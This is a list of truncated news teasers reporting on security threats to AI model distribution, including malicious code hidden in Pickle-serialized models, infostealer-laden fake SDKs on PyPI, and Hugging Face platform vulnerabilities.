The popular Python Pickle serialization format, which is common for distributing AI models, offers ways for attackers to inject malicious code that will be executed on computers when loading models ...
Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization. The method focuses on the "pickling" process used to ...
A new campaign exploiting machine learning (ML) models via the Python Package Index (PyPI) has been observed by cybersecurity researchers. ReversingLabs said threat actors are using the Pickle file ...
Fake Alibaba Labs AI SDKs hosted on PyPI included PyTorch models with infostealer code inside. With support for detecting malicious code inside ML models lacking, expect the technique to spread.
Two critical security vulnerabilities in the Hugging Face AI platform opened the door to attackers looking to access and alter customer data and models. One of the security weaknesses gave attackers a ...